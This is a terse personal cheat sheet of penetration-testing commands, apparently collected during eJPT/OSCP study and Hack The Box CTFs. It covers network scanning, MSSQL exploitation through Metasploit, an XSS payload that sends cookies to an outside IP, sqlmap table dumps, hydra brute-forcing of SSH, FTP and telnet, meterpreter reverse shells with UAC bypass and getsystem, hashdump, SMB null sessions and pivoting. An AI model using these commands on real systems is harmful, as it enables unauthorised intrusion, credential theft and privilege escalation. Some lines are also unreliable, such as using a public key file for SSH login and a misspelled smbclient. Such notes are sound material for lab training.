note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.
nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
add -O to find the OS
gobuster -u 'url' -w /path/to/dir-list-med.txt
-U user
-P pass
connect
> mysql -u user -pPASS -h mysql_server --port=
see database
> show databases;
> use database_name;
see table
> show tables;
see content of tables
> SELECT * FROM accounts
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> xp_cmdshell is Enabled
--> remote access is Enabled
use exploit/windows/mssql/mssql_payload
<script>new Image().src="http://192.168.99.11/get.php?a="+document.cookie;</script>
test for sqli with sqlmap
> sqlmap -u 'website/?id='
see tables
> sqlmap -u 'website' --tables
dump tables
> sqlmap -u 'website/?id=vuln' --dump -T table_name
SSH
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ssh://ip -v -I
FTP
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ftp://ip -v -I
TELNET
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt telnet://ip -v -I
john file_to_crack
search XXX
use XXX
show payload
show options
set payload windows ou linux/meterpreter/reverse_tcp
background = background current session
sessions -l
sessions -i X
getuid
getsystem
-->IF IT FAILS
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem
shell
search -f fichier_recherche
hashdump (then johntheripper to crack)
to use id_rsa.pub
create ~/.ssh/id_rsa.pub
ssh -i ~/.ssh/id_rsa.pub user@ip
give pass
perl enum4linux -a <ip>
<20> --> file sharing, carry on
smbclient -L //<ip> -N
connect without pass
smblient //<ip>/SHARE_NAME -N
ip route add subnet/24 via <ip>
1) background meterpreter session
2) use post/multi/manage/autoroute
3) set SESSION 1
4) set SUBNET 172.16.50.0
5) set CMD add
6) run
cd /
dir /s /b passwords.txt
dir /s /b credentials.txt